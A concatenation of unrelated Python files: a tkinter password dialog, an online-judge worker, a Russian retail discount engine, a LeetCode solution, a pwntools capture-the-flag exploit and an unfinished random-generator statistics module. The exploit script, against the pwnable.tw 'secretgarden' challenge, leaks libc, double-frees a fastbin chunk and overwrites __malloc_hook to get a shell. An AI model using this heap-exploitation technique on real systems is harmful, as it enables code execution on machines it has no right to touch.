# on affiche une boîte de dialogue puis on ferme la fenêtre
msgb.showinfo('Résultat','Mot de passe correct.\nAu revoir !')
mon_app.destroy()
else:
# le mot de passe est incorrect : on affiche une boîte de dialogue
msgb.showwarning('Résultat','Mot de passe incorrect.\nVeuillez recommencer !')
mot_de_passe.set('')
# Création de la fenêtre principale (main window)
mon_app = tk.Tk()
mon_app.title('Identification requise')
# Création d'un widget Label (texte 'Mot de passe')
texte1 = tk.Label(mon_app, text='Mot de passe ')
texte1.grid(row=0, column=0)
# Création d'un widget Entry (champ de saisie)
mot_de_passe = tk.StringVar()
ligne_saisie = tk.Entry(mon_app, textvariable=mot_de_passe, show='*', bg='bisque', fg='maroon')
ligne_saisie.focus_set()
ligne_saisie.grid(row=0, column=1)
# Création d'un widget Button (bouton Valider)
tk.Button(mon_app, text='Valider', command=verification).grid(row=0, column=2)
mon_app.mainloop() |
'''程序入口,进行数据库的读取和存储,读取出来的数据提交给judger模块'''
import time
import config
import judger
import pymysql
from support import NoMatchError, LoginError, SubmitError
def main():
while True:
# 打开数据库
db = pymysql.connect(host = config.dbhost, port = config.dbport, user = config.dbuser, passwd = config.dbpassword, db = config.dbname, charset = config.dbcharset)
cursor = db.cursor()
match = cursor.execute("SELECT * FROM submit WHERE id = (SELECT min(id) FROM submit WHERE result = 'Waiting')")
if not match:
cursor.close()
db.close()
time.sleep(3)
continue
match = cursor.fetchall()
sub = {}
sub["oj"], sub["pid"], sub["language"], sub["code"] = match[0][1], match[0][2], match[0][3], match[0][4]
print("New task")
try:
sub["runid"], sub["result"], sub["timeused"], sub["memoryused"], sub["errorinfo"] = judger.judge(sub, config.users, config.timeout, config.time_interval)
except KeyError:
cursor.execute("DELETE FROM submit WHERE id = %s",match[0][0])
db.commit()
print("%s Not Find In Support"%sub["oj"])
except LoginError:
print("Login error")
except SubmitError:
print("Submit error")
except NoMatchError as error:
print("No match error:%s"%error)
except Exception as error:
print("Unknown error:%s"%error)
else:
print("end of the judged")
cursor.execute("UPDATE submit SET runid = %s, result = %s, timeused = %s, memoryused = %s, errorinfo = %s WHERE id = %s",(
sub["runid"], sub["result"], sub["timeused"], sub["memoryused"], sub["errorinfo"], match[0][0]))
db.commit()
finally:
cursor.close()
db.close()
break
if __name__=="__main__":
main() |
import sqlite3, os, threading, json, time, sys
import barcodenumber
from datetime import datetime
from domino.core import log
from domino.postgres import Postgres
from discount.actions import Action
from discount.series import Series
from discount.core import DISCOUNT_DB, SCHEMES_FOLDER, Engine
#from discount.actions import ActionSetItem
from discount.cards import Card, CardLog
from discount.checks import Check
from discount.schemas import ДисконтнаяСхема
from tables.sqlite.schema import Schema
from discount.dept_sets import DeptSetItem
from threading import Lock
#from settings import log as discount_log
from domino.databases.sqlite import Sqlite
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from tables.sqlite.product_set import ГотовыеНаборы
UpdateLock = Lock()
СТАНДАРТНАЯ_ОБРАБОТКА_КАРТ = 'A16'
class ErrorCalculator:
def __init__(self, action_ID, error):
self.action_ID = action_ID
self.error = error
self.сообщение = f'{action_ID} : НЕДОСТУПНА'
def calc(self, курсор, чек):
чек.write_log(self.сообщение, self.error)
def accept(self, курсор, чек):
чек.write_log(self.сообщение, self.error)
def check_base_conditions(self, check):
return True
class AccountSchemeWorker:
#def __init__(self, application, курсор, схема, goods, LOG, SQLITE):
def __init__(self, application, schema_id, goods, path, bigsize):
self.application = application
self.schema_id = schema_id
self.схема = None
self.goods = goods
self.path = path
self.bigsize = bigsize
self.opened = False
self.calulators = [] # Расчетные акцииЮ основной список
self.after_totals = [] # Расчетные акции, выполняющиеся после подведения итогов по скидкам
self.for_sale = [] # Список акций, исполняющихся при оценки цен для печати ценников и этикеток
self.acceptors = [] # Послепродажные действия (акции)
self.accept_calc = [] # список послепродажных акций, имеющих возможность расчета
self.before_accept = [] # Послепродажные действия, выполняющихся в первую очередь
self.action_names = {} # словать имен акций
self.готовые_наборы = None
#self.open(dbpath, LOG)
@property
def action_types(self):
return self.application['action_types']
@property
def card_types(self):
return self.application['card_types']
def close(self):
if self.opened:
self.SQLITE.close()
self.opened = False
def open(self, LOG):
if self.opened: return self
start = time.perf_counter()
self.calulators = [] # Расчетные акцииЮ основной список
self.after_totals = [] # Расчетные акции, выполняющиеся после подведения итогов по скидкам
self.for_sale = [] # Список акций, исполняющихся при оценки цен для печати ценников и этикеток
self.acceptors = [] # Послепродажные действия (акции)
self.accept_calc = [] # список послепродажных акций, имеющих возможность расчета
self.before_accept = [] # Послепродажные действия, выполняющихся в первую очередь
self.action_names = {} # словать имен акций
#--------------------------------------------------
connection = sqlite3.connect(f'file://{self.path}?mode=ro', uri=True)
ENGINE = create_engine(f'sqlite:///{self.path}')
Session = sessionmaker(bind=ENGINE)
self.SQLITE = Session()
курсор = connection.cursor()
#--------------------------------------------------
self.схема = ДисконтнаяСхема.get(курсор, self.schema_id)
LOG.header(f'{self.схема.наименование}')
#--------------------------------------------------
self.LOG = LOG
self.готовые_наборы = ГотовыеНаборы(self.SQLITE, LOG = LOG, bigsize = self.bigsize)
self.create_actions(LOG, connection)
self.готовые_наборы.prepeare(LOG = self.LOG)
self.opened = True
LOG(f'{self.схема.наименование}', start)
connection.close()
return self
def готовый_набор(self, sets, name=None):
return self.готовые_наборы.готовый_набор(sets, name)
def create_actions(self, LOG, connection):
#start = time.perf_counter()
#LOG = self.LOG
схема = self.схема
курсор = connection.cursor()
actions_start = time.perf_counter()
actions = []
for action_id in схема.расчетные_акции.список_акций:
action = Action.get(курсор, action_id)
if action is None:
log.error(f'Не найдено описание акции {action_id}')
LOG(f'error:Не найдено описание акции {action_id}')
continue
if action.status < 0:
LOG(f'error:Акция "{action_id}" недоступна')
continue
actions.append(action)
LOG(f'Получение списка расчетных акций', actions_start)
for action in actions:
try:
LOG.header(f'{action.full_name(self.action_types)}({action.id}, {action.type_})')
action_start = time.perf_counter()
action_type = self.action_types[action.type]
calculator = action_type.Calculator(self, курсор, action, LOG, self.SQLITE)
if calculator.for_sale:
self.for_sale.append(calculator)
if action.type == 'A24' or action.type == 'A26':
self.after_totals.append(calculator)
else:
self.calulators.append(calculator)
self.action_names[f'{action.ID}'] = action.полное_наименование(self.action_types)
LOG(f'{action.full_name(self.action_types)}({action.id}, {action.type_})', action_start)
except BaseException as ex:
LOG(f'error:{ex}')
log.exception(__file__)
calculator = ErrorCalculator(action.id, f'{ex}')
self.calulators.append(calculator)
# СТАНДАРТНАЯ_ОБРАБОТКА_КАРТ
action_start = time.perf_counter()
try:
action_type = self.action_types[СТАНДАРТНАЯ_ОБРАБОТКА_КАРТ]
self.before_accept.append(action_type.Acceptor(self, курсор, None, self.LOG, self.SQLITE))
except BaseException as ex:
log.exception(f'{self} : {СТАНДАРТНАЯ_ОБРАБОТКА_КАРТ} : {ex}')
LOG(f'{ex}')
LOG(f'{СТАНДАРТНАЯ_ОБРАБОТКА_КАРТ}', action_start)
actions = []
actions_start = time.perf_counter()
for action_id in схема.послепродажные_акции.список_акций:
action = Action.get(курсор, action_id)
if action is None:
log.error(f'Не найдено акции "{action_id}"')
LOG(f'Не найдено описание акции {action_id}')
continue
if action.status < 0:
LOG(f'Акция {action_id} заблокирована')
continue
LOG('Получение списка послепродажных акций', actions_start)
for акция_ID in схема.послепродажные_акции.список_акций:
action = Action.get(курсор, акция_ID)
#LOG(f'{action}')
if action is None:
LOG(f'error:Не найдено описание акции "{акция_ID}"')
continue
if action.status < 0:
LOG(f'error:Акция "{акция_ID}" недоступна')
continue
actions.append(action)
for action in actions:
try:
LOG(f'{action.full_name(self.action_types)}({action.id}, {action.type_})')
action_start = time.perf_counter()
action_type = self.action_types[action.type]
worker = action_type.Acceptor(self, курсор, action, self.LOG, self.SQLITE)
self.acceptors.append(worker)
if hasattr(worker, 'calc'):
self.accept_calc.append(worker)
self.action_names[f'{action.ID}'] = action.полное_наименование(self.action_types)
LOG(f'{action.full_name(self.action_types)}({action.id}, {action.type_})',action_start)
except BaseException as ex:
log.exception(f'{self} : {action} : {ex}')
LOG(f'error:{ex}')
calculator = ErrorCalculator(action.id, f'{ex}')
self.calulators.append(calculator)
#self.LOG(f'{self}', start)
def __str__(self):
return f'AccountSchemeWorker({self.schema_id})'
def __repr__(self):
return self.__str__()
def make_totals(self, check):
#check.write_log('ПОДСЧЕТ ИТОГОВ')
totals = {}
check.points = {}
for account_id, gift in check.gifts.items():
totals[account_id] = gift
for line in check.lines:
actions = line.actions
if actions is not None:
for action in actions:
action_id = f'{action[Check.LINE_ACTION_ID]}'
#log.debug(f'ACTION {action}, {check.card_id}')
#check.write_log(f'Акция {action_id} : {action}')
discount = action[Check.LINE_ACTION_DISCOUNT]
if discount:
discount = int(discount * 100) # в копейках все
card_id = action[Check.LINE_ACTION_CARD_ID]
if card_id and check.card_id and card_id == check.card_id:
points = action[Check.LINE_ACTION_POINTS]
if points:
points = int(points * 100) # в копейках все
#log.debug(f'POINTS = {points}')
else:
points = 0
if discount or points:
total = totals.get(action_id)
if total:
total['d'] = total.get('d', 0) + discount
if points:
total['p-'] = total.get('p-', 0) + points
else:
total = {'d':discount}
if points:
total['p-'] = points
totals[action_id] = total
check.totals = totals
check.write_log(f'ПОДСЧЕТ ИТОГОВ')
def calc(self, engine, check, LOG=None):
engine.pg_connection.autocommit = True
check.goods = self.goods
check.params['schema_id'] = self.schema_id
if check.for_sale:
for action_worker in self.for_sale:
try:
if action_worker.check_base_conditions(check):
action_worker.calc(engine, check)
except BaseException as ex:
log.exception(f'{action_worker}')
check.write_log(f'{action_worker} : {ex}')
else:
# поиск и загрузка карт
msg = []
for card_ID, card_info in check.cards.items():
CARD = Card.get(engine, card_ID)
if CARD:
if CARD.TYPE == 0:
check.card_id = card_ID
if CARD.points:
check.card_points = int(CARD.points * 100)
else:
check.card_points = 0
card_info[Check.CARD_CARD] = CARD
msg.append(f'карта {card_ID}')
else:
msg.append(f'карта {card_ID} НЕ НАЙДЕНА')
check.write_log('ПОИСК КАРТ', ", ".join(msg))
#check.find_cards(engine)
#--------------------------------------
for action_worker in self.calulators:
try:
if action_worker.check_base_conditions(check):
action_worker.calc(engine, check)
except BaseException as ex:
log.exception(f'{action_worker}')
check.write_log(f'{action_worker} : {ex}')
check.action_names = self.action_names
for action_worker in self.accept_calc:
try:
if action_worker.check_base_conditions(check):
action_worker.calc(engine, check)
except BaseException as ex:
log.exception(f'{action_worker}')
check.write_log(f'{action_worker} : {ex}')
self.make_totals(check)
for action_worker in self.after_totals:
try:
if action_worker.check_base_conditions(check):
action_worker.calc(engine, check)
except BaseException as ex:
log.exception(f'{action_worker}')
check.write_log(f'{action_worker} : {ex}')
def get_keywords(self, keywords, check, LOG=None):
check.goods = self.goods
check.params['schema_id'] = self.schema_id
for calculator in self.calulators:
if hasattr(calculator, 'get_keywords'):
calculator.get_keywords(keywords, check)
#log.debug(f'{calculator} : {check.keywords}')
def get_prices(self, prices, dept_code, date, LOG=None):
for calculator in self.calulators:
if hasattr(calculator, 'get_prices'):
calculator.get_prices(prices, dept_code, date)
def find_used_cards(self, engine, чек):
# добавление в список карт, карт из информации об акциях из строк чека
# формирование дополнительных данных СКИДКИ и ИСПОЛЬЗОВАННЫЕ БАЛЛЫ
for line in чек.lines:
actions = line.params.get(Check.LINE_CALC_INFO)
if actions: # есть информация по проведенным акциям
#log.debug(f'{line.calc_info.actions}')
for action in actions:
скидка = action[Check.LINE_ACTION_DISCOUNT]
card_ID = action[Check.LINE_ACTION_CARD_ID]
try:
points = action[Check.LINE_ACTION_POINTS]
except:
points = 0
if card_ID and card_ID.strip():
# есть скидка за карту, вставляем карту в список карт
card_info = чек.cards.get(card_ID)
if card_info is None:
card_info = {}
#check_card = CheckCard(card_id)
#check_card.card = Card.get(курсор, check_card.id)
card_info[Check.CARD_DISCOUNT] = скидка
card_info[Check.CARD_POINTS] = points
чек.cards[card_ID] = card_info
#log.debug(f'create {card_id} {скидка}, {points}')
#msg.append(f'"{check_card.id}"')
else:
DISCOUNT = card_info.get(Check.CARD_DISCOUNT, 0)
card_info[Check.CARD_DISCOUNT] = DISCOUNT + скидка
POINTS = card_info.get(Check.CARD_POINTS, 0)
card_info[Check.CARD_POINTS] = POINTS + points
#log.debug(f'append {card_id} {скидка}, {points} => {check_card.discount}, {check_card.points}')
# собственно поиск карт в базе данных
msg = []
for card_ID, card_info in чек.cards.items():
points = card_info.get(Check.CARD_POINTS)
if points:
points = round(points, 2)
card_info[Check.CARD_POINTS] = points
msg.append(f'карта {card_ID}')
if points:
msg.append(f'использованные баллы {points}')
card = Card.get(engine, card_ID)
if card is None:
msg.append('не найдена')
else:
card_info[Check.CARD_CARD] = card
if card.TYPE == 0:
чек.card_id = card_ID
msg.append(f'персональная')
чек.write_log('ПОИСК КАРТ', ", ".join(msg))
def accept(self, engine, check, LOG=None):
check.goods = self.goods
check.params['schema_id'] = self.schema_id
self.find_used_cards(engine, check)
for acceptor in self.before_accept:
try:
acceptor.accept(engine, check)
except BaseException as ex:
log.exception(f'{acceptor}')
check.write_log(f'{acceptor} : {ex}')
for acceptor in self.acceptors:
try:
if acceptor.check_base_conditions(check):
acceptor.accept(engine, check)
except BaseException as ex:
log.exception(f'{acceptor}')
check.write_log(f'{acceptor} : {ex}')
class Goods:
def __init__(self, account_id):
self.account_id = account_id
self.folder = SCHEMES_FOLDER(self.account_id)
self.GOODS_JSON_FILE = os.path.join(self.folder, 'goods.json')
self.goods_mtime = None
self.columns = None
self.rows = None
def __str__(self):
return f'<Goods {self.account_id}>'
def match(self, code, query):
#log.debug(f'MATCH {code} : {query}')
try:
row = self.rows[code]
#log.debug(f'MATCH COLUMNS : {self.columns}')
#log.debug(f'MATCH ROW : {row}')
for column_id, values in query.items():
column_no = self.columns.index(column_id)
#log.debug(f'MATCH COLUMN NO : {column_no}')
if row[column_no] not in values:
#log.debug(f'MATCH VALUE : {row[column_no]}')
return False
return True
except:
log.exception(__file__)
return False
def update(self, LOG):
if os.path.isfile(self.GOODS_JSON_FILE):
start = time.perf_counter()
goods_mtime = os.path.getmtime(self.GOODS_JSON_FILE)
if self.goods_mtime is None or goods_mtime != self.goods_mtime:
with open(self.GOODS_JSON_FILE) as f:
goods = json.load(f)
self.columns = goods['columns']
self.rows = goods['goods']
LOG(f'ОБНОВЛЕНИЕ СПРАВОЧНИКА ТОВАРОВ {self.account_id} ({self.goods_mtime}, {goods_mtime})', start)
self.goods_mtime = goods_mtime
class AccountDeptWorker:
def __init__(self, application, account_id, dept_code, LOG):
start = time.perf_counter()
self.application = application
self.account_id = account_id
self.dept_code = dept_code
self.goods = Goods(account_id)
try:
LOG(f'{self}')
SQLITE = Sqlite.Pool().session(account_id, 'discount')
conn = sqlite3.connect(DISCOUNT_DB(account_id))
cursor = conn.cursor()
self.schema = None
base_schema = None
for schema in ДисконтнаяСхема.findall(cursor):
if schema.это_основная_схема:
base_schema = schema
else:
sql = f'select info from dept_set_item where dept_set=?'
params = [schema.набор_подразделений_ID]
cursor.execute(sql, params)
for INFO, in cursor:
info = json.loads(INFO)
code = info['code']
#discount_log.worning(f'схема {self.schema} : подразделение {code}')
if code == dept_code:
self.schema = schema
break
if self.schema is not None:
break
if self.schema is None:
self.schema = base_schema
# --------------------------------
self.goods.update(LOG)
#LOG(f'{self.schema} : {self.schema.полное_наименование}')
self.worker = AccountSchemeWorker(self.application, self.schema.ID, self.goods, path=DISCOUNT_DB(account_id), bigsize=0)
self.worker.open(LOG)
LOG(f'{self} : {self.schema}', start)
except Exception as ex:
LOG(f'{self} : {ex}')
log.exception(__file__)
finally:
SQLITE.close()
conn.close()
def close(self):
self.worker.close()
def calc(self, check, LOG, POSTGRES):
if self.worker is None:
check.write_log(f'ПОЛУЧЕНИЕ РАСЧЕТНЫХ АКЦИЙ', f'НЕТ НИ ОДНОЙ АКЦИИ')
else:
pg_connection = Postgres.connect(self.account_id)
with pg_connection:
engine = Engine(None, pg_connection)
check.write_log(f'ОТКРЫТИЕ СОЕДИНЕНИЯ С БД')
self.worker.calc(engine, check, LOG)
engine.close()
xml = check.xml()
xml = '<?xml version="1.0" encoding="UTF-8"?>\n' + xml.decode("utf-8")
#check.dump()
check.save_xml_file(xml, 'calc.r.xml')
return xml
def get_keywords(self, keywords, check, LOG, POSTGRES):
self.worker.get_keywords(keywords, check, LOG)
def accept(self, check, LOG, POSTGRES):
if self.worker is None:
check.write_log(f'НЕТ НИ ОДНОЙ АКЦИИ')
else:
pg_connection = Postgres.connect(self.account_id)
with pg_connection:
engine = Engine(None, pg_connection)
check.write_log(f'ОТКРЫТИЕ СОЕДИНЕНИЯ С БД')
self.worker.accept(engine, check, LOG)
check.create(engine)
engine.close()
check.write_log(f'ЗАКРЫТИЕ СОЕДИНЕНИЯ С БД')
def get_prices(self, dept_code, date, LOG, POSTGRES):
prices = {}
self.worker.get_prices(prices, dept_code, date, LOG)
return prices
def __str__(self):
return f'<AccountDeptWorker {self.account_id} {self.dept_code}>'
def __repr__(self):
return self.__str__()
class AccountWorker:
def __init__(self, application, account_id):
self.application = application
self.account_id = account_id
self.goods = Goods(account_id)
self.folder = SCHEMES_FOLDER(self.account_id)
#self.основной_калькулятор = None
#self.калькулятор_подразделения = {}
self.worker_of_scheme = {}
self.scheme_of_dept = {}
self.VERSION = ''
self.VERSION_FILE = os.path.join(self.folder, 'VERSION')
self.connection_pool = Postgres.create_connection_pool(account_id, 1, 10)
log.info(f'СОЗДАНИЕ ПУЛА СОЕДИНЕНИЙ 1 10')
#self.scheme_workers = {}
#self.default_worker
#self.scheme_worker_of_dept.get(dept_code) = 1
def close(self):
for worker in self.worker_of_scheme.values():
worker.close()
self.worker_of_scheme = {}
self.scheme_of_dept = {}
def update(self, LOG):
with UpdateLock:
self.goods.update(LOG)
with open(self.VERSION_FILE) as f:
VERSION = f.read()
if self.VERSION != VERSION:
start = time.perf_counter()
LOG(f'{self} ({self.VERSION}, {VERSION})')
self.VERSION = VERSION
#----------------------------------
self.close()
#self.основнай_калькулятор = None
#self.калькулятор_подразделения = {}
#-----------------------------------------
# ПОЛУЧЕНИЕ СПИСКА ДИСКОНТНЫХ СХЕМ И ПОДРАЗДЕЛЕНИЙ
#-----------------------------------------
for schema_id in os.listdir(self.folder):
if schema_id.isdigit():
schema_id = int(schema_id)
path = os.path.join(self.folder, str(schema_id))
ENGINE = create_engine(f'sqlite:///{path}')
Session = sessionmaker(bind=ENGINE)
SQLITE = Session()
try:
# корректирровка для старых версий
bigsize_exists = False
cur = SQLITE.execute(f'pragma table_info(schema)').fetchall()
for column in cur:
if column[1] == 'bigsize':
bigsize_exists = True
break
if not bigsize_exists:
sql = 'alter table schema add column bigsize integer'
log.debug(sql)
SQLITE.execute(sql)
SQLITE.commit()
# -----------------------------
schema = SQLITE.query(Schema).get(schema_id)
#conn = sqlite3.connect(f'file://{path}?mode=ro',uri=True)
#cursor = conn.cursor()
#schema = ДисконтнаяСхема.get(cursor, schema_id)
#INFO = SQLITE.execute(f'select INFO from schema where id = {schema_id}').fetchone()[0]
#try:
# bigsize = SQLITE.execute(f'select bigsize from schema where id = {schema_id}').fetchone()[0]
#except:
# bigsize = None
codes = []
#LOG(f'{path} {schema.наименование}')
if schema_id == 0:
worker = AccountSchemeWorker(self.application, schema_id, self.goods, path=path, bigsize = schema.bigsize)
self.worker_of_scheme[schema_id] = worker
#self.основной_калькулятор = worker
else:
worker = AccountSchemeWorker(self.application, schema_id, self.goods, path=path, bigsize = schema.bigsize)
self.worker_of_scheme[schema_id] = worker
codes = schema.get_dept_codes(SQLITE)
#for item in DeptSetItem.findall(cursor, 'dept_set=?', [schema.набор_подразделений_ID]):
# codes.append(item.info['code'])
for code in codes:
self.scheme_of_dept[code] = schema_id
LOG(f'{path} {schema.наименование} {codes}')
except Exception as ex:
log.exception(__file__)
LOG.error(ex)
finally:
SQLITE.close()
#if conn:
# conn.close()
LOG(f'Распределение дисконтных схем'.upper(), start)
LOG(f'{self.worker_of_scheme}')
LOG(f'{self.scheme_of_dept}')
#-----------------------------------------
# ПОСТРОЕНИЕ ОБРАБОТЧИКОВ ДИСКОНТНЫХ СХЕМ
#-----------------------------------------
#LOG(f'Построение обработчиков'.upper())
#for schema_id, scheme_worker in self.worker_of_scheme.items():
# scheme_worker.open(LOG)
# ------------------------------------------------
def get_worker(self, dept_code, LOG):
self.update(LOG)
schema_id = self.scheme_of_dept.get(dept_code, 0)
worker = self.worker_of_scheme.get(schema_id)
worker.open(LOG)
#return self.калькулятор_подразделения.get(dept_code, self.основной_калькулятор)
return worker
def calc(self, check, LOG, POSTGRES):
калькулятор = self.get_worker(check.dept_code, LOG)
check.params[Check.VERSION] = self.VERSION
if калькулятор is None:
check.write_log(f'ПОЛУЧЕНИЕ РАСЧЕТНЫХ АКЦИЙ', f'НЕТ НИ ОДНОЙ АКЦИИ')
else:
check.write_log(f'ПОЛУЧЕНИЕ РАСЧЕТНЫХ АКЦИЙ')
#conn = self.application.account_database_connect(self.account_id)
pg_connection = None
try:
#pg_connection = Postgres.connect(self.account_id)
pg_connection = self.connection_pool.getconn()
with pg_connection:
engine = Engine(None, pg_connection)
check.write_log(f'ОТКРЫТИЕ СОЕДИНЕНИЯ С БД')
калькулятор.calc(engine, check, LOG)
engine.close()
self.connection_pool.putconn(pg_connection)
check.write_log(f'ЗАКРЫТИЕ СОЕДИНЕНИЯ С БД')
except BaseException as ex:
log.exception(f'{self}.calc')
if pg_connection:
self.connection_pool.putconn(pg_connection)
raise Exception(f'{ex}')
xml = check.xml()
xml = '<?xml version="1.0" encoding="UTF-8"?>\n' + xml.decode("utf-8")
#check.dump()
check.save_xml_file(xml, 'calc.r.xml')
return xml
def get_keywords(self, keywords, check, LOG, POSTGRES):
worker = self.get_worker(check.dept_code, LOG)
check.params[Check.VERSION] = self.VERSION
worker.get_keywords(keywords, check, LOG)
def accept(self, check, LOG, POSTGRES):
калькулятор = self.get_worker(check.dept_code, LOG)
check.params[Check.VERSION] = self.VERSION
if калькулятор is None:
check.write_log(f'ПОЛУЧЕНИЕ ПОСЛЕПРОДАЖНЫХ АКЦИЙ', 'НЕТ НИ ОДНОЙ АКЦИИ')
else:
check.write_log(f'ПОЛУЧЕНИЕ ПОСЛЕПРОДАЖНЫХ АКЦИЙ')
#conn = self.application.account_database_connect(self.account_id)
pg_connection = None
try:
#pg_connection = Postgres.connect(self.account_id)
pg_connection = self.connection_pool.getconn()
with pg_connection:
engine = Engine(None, pg_connection)
check.write_log(f'ОТКРЫТИЕ СОЕДИНЕНИЯ С БД')
калькулятор.accept(engine, check, LOG)
check.create(engine)
engine.close()
self.connection_pool.putconn(pg_connection)
check.write_log(f'ЗАКРЫТИЕ СОЕДИНЕНИЯ С БД')
#try:
# check.dump()
#except BaseException as ex:
# log.exception(f'save')
#check.params[Check.ERROR] = f'{ex}'
except BaseException as ex:
log.exception(f'{self}.calc')
if pg_connection:
self.connection_pool.putconn(pg_connection)
raise Exception(f'{ex}')
def get_prices(self, dept_code, date, LOG, POSTGRES):
prices = {}
worker = self.get_worker(dept_code, LOG)
worker.get_prices(prices, dept_code, date, LOG)
return prices
def __str__(self):
return f'<AccountWorker {self.account_id}>'
def __repr__(self):
return self.__str__()
class Calculator:
def __init__(self, application):
self.application = application
self.workers = {}
def account_worker(self, account_id, LOG):
worker = self.workers.get(account_id)
if worker is None:
worker = AccountWorker(self.application, account_id)
self.workers[account_id] = worker
return worker
def calc(self, check, LOG, POSTGRES):
return self.account_worker(check.account_id, LOG).calc(check, LOG, POSTGRES)
def get_keywords(self, keywords, check, LOG, POSTGRES):
self.account_worker(check.account_id, LOG).get_keywords(keywords, check, LOG)
def accept(self, check, LOG, POSTGRES):
self.account_worker(check.account_id, LOG).accept(check, LOG, POSTGRES)
def get_prices(self, account_id, dept_code, date, LOG, POSTGRES):
return self.account_worker(account_id, LOG).get_prices(dept_code, date, LOG)
def __str__(self):
return f'Calculator()'
|
"""
16. 最接近的三数之和
给定一个包括 n 个整数的数组 nums 和 一个目标值 target。找出 nums 中的三个整数,使得它们的和与 target 最接近。
返回这三个数的和。假定每组输入只存在唯一答案。
例如,给定数组 nums = [-1,2,1,-4], 和 target = 1.
与 target 最接近的三个数的和为 2. (-1 + 2 + 1 = 2).
"""
class Solution:
def threeSumClosest(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: int
"""
"""
这里和3Sum类似,但是重点是:
1.首先判断是否比之前的距离小
2.第二次判断的是三个数之和和target的差别,这里就不需要和前者的距离进行比较了
"""
n = len(nums)
nums.sort()
ans = nums[0] + nums[1] + nums[n-1]
for i in range(n-2):
left = i + 1
right = n - 1
while left < right:
val = nums[i] + nums[left] + nums[right]
if val == target:
return val
if abs(val - target) < abs(target - ans):
ans = val
if val < target:
left += 1
else:
right -= 1
return ans
if __name__ == '__main__':
s = Solution()
s.threeSumClosest([-1,2,1,-4], 1) |
from pwn import *
def cmd(c):
p.sendlineafter("choice : ",str(c))
def add(name="XXXX",l=0x80,c="AAAA"):
cmd(1)
p.sendlineafter("name :",str(l))
p.sendafter("flower :",name)
p.sendlineafter("flower :",c)
def show():
cmd(2)
def free(idx):
cmd(3)
p.sendlineafter("garden:",str(idx))
def clear():
cmd(4)
#p=process("secretgarden",env={"LD_PRELOAD":"./libc_64.so.6"})
p=remote("chall.pwnable.tw",10203)
context.arch='amd64'
add()#0
add()#1
free(0)
clear()
add("A")
#context.log_level='debug'
show()
p.readuntil("Name of the flower[0] :")
base=u64(p.readline()[:-1].ljust(8,'\x00'))-(0x7ffff7dd1b41-0x7ffff7a0d000)+0x1000
#libc=ELF("./secretgarden").libc
libc=ELF("./libc_64.so.6")
libc.address=base
log.warning(hex(base))
add("nier",0x68)#2
add("nier",0x68)#3
add()
free(2)
free(3)
free(2)
clear()
add(p64(libc.symbols['__malloc_hook']-35),0x68)#2
add("\n",0x68)#3
add("\n",0x68)#2
add("\x00"*19+p64(0xef6c4+base),0x68)#2
free(2)
free(2)
#gdb.attach(p)
p.interactive()
|
import random
import matplotlib.pyplot as plot
from abc import ABC
from abc import abstractmethod
from math import sqrt
from math import log10
from typing import List
from random import random
from itertools import repeat
from bisect import bisect_right
from scipy.special import erfinv
class RandomGenerator(ABC):
_NUM_LENGTH = 8
_LEFT_BOUND = 10000000
_RIGHT_BOUND = 99999999
def __init__(self, *, seed: int = None):
if seed is None:
self.seed = random.randint(self._LEFT_BOUND, self._RIGHT_BOUND)
elif not self._LEFT_BOUND <= seed <= self._RIGHT_BOUND:
raise ValueError(f"Seed must be in [{self._LEFT_BOUND};{self._RIGHT_BOUND}].")
else:
self.seed = seed
@abstractmethod
def once(self) -> float:
pass
@abstractmethod
def generate(self, *, amount: int) -> List[float]:
pass
class MultiplicativeCongruentRandomGenerator(RandomGenerator):
def __init__(self, *, seed: int = None, m: int, k: int):
super().__init__(seed=seed)
self.m = m
self.k = k
def once(self) -> float:
self.seed = self.k * self.seed % self.m
return round(self.seed / self.m, self._NUM_LENGTH)
def generate(self, *, amount: int) -> List[float]:
selection = []
for _ in repeat(None, amount):
self.seed = self.k * self.seed % self.m
selection.append(round(self.seed / self.m, self._NUM_LENGTH))
return selection
expectation = lambda seq: sum(seq) / len(seq)
dispersion = lambda seq, exp: sum([e ** 2 - exp ** 2 for e in seq]) / len(seq)
def find_correlation(seq_x, seq_y):
xy = [e1 * e2 for (e1, e2) in zip(seq_x, seq_y)]
x_exp = expectation(seq_x)
y_exp = expectation(seq_y)
xy_exp = expectation(xy)
x_disp = dispersion(seq=seq_x, exp=x_exp)
y_disp = dispersion(seq=seq_y, exp=y_exp)
return (xy_exp - x_exp * y_exp) / sqrt(x_disp * y_disp)
def create_histogram(*, seq):
size = len(seq)
sections = int(sqrt(size) + 1 if size <= 100 else 3 * log10(size))
delta = 1 / sections
left = 0
for i in range(sections):
right = left + delta
cnt = sum([1 if left <= e < right else 0 for e in seq])
h = cnt / size
plot.bar(left, h, width=delta, align="edge")
left = right
return plot
def m_confidence_interval(*, seq, alpha=0.95) -> (float, float):
size = len(seq)
exp = expectation(seq)
dev = sqrt(dispersion(seq, exp))
z = erfinv(alpha / 2)
lhs = exp - dev * z / sqrt(size)
rhs = exp + dev * z / sqrt(size)
return lhs, rhs
def d_confidence_interval(*, seq, alpha=0.95) -> (float, float):
size = len(seq)
exp = expectation(seq)
disp = dispersion(seq, exp)
z = erfinv(alpha / 2)
lhs = disp - z * sqrt(2 / (size - 1)) * disp
rhs = disp + z * sqrt(2 / (size - 1)) * disp
return lhs, rhs
class CRNGenerator:
def fxy(self, *, x: float, y: float) -> float:
return 2 * (x ** 2 + y / 3)
def fx(self, x: float) -> float:
return 2 * x ** 2 + 1 / 3
def fy(self, y: float) -> float:
return (2 + 2 * y) / 3
x_supremum = 2 + 1 / 3
y_supremum = 4 / 3
xy_y_supremum = 0
x_selection = []
y_selection = []
def __init__(self, *, generator: RandomGenerator):
self.generator = generator
def generate(self, *, amount: int) -> (List[float], List[float]):
self.x_selection.clear()
self.y_selection.clear()
while len(self.x_selection) != amount:
rand_x, rand_z = self.generator.generate(amount=2)
if rand_z * self.x_supremum < self.fx(rand_x):
self.x_selection.append(rand_x)
while len(self.y_selection) != amount:
rand_y, rand_z = self.generator.generate(amount=2)
cur_x = self.x_selection[len(self.y_selection)]
if rand_z * self.xy_y_supremum < self.fxy(x=cur_x, y=rand_y) / self.fx(cur_x):
self.y_selection.append(rand_y)
return self.x_selection, self.y_selection
class DRNGenerator:
intervals = []
distribution = []
x_selection = []
y_selection = []
def F(self, *, x: float, y: float) -> float:
return (x * y * (2 * x ** 2 + y)) / 3
def _F(self, *, x: float, y: float) -> float:
return self.F(x=x, y=y) \
- self.F(x=x - self.step, y=y) \
- self.F(x=x, y=y - self.step) \
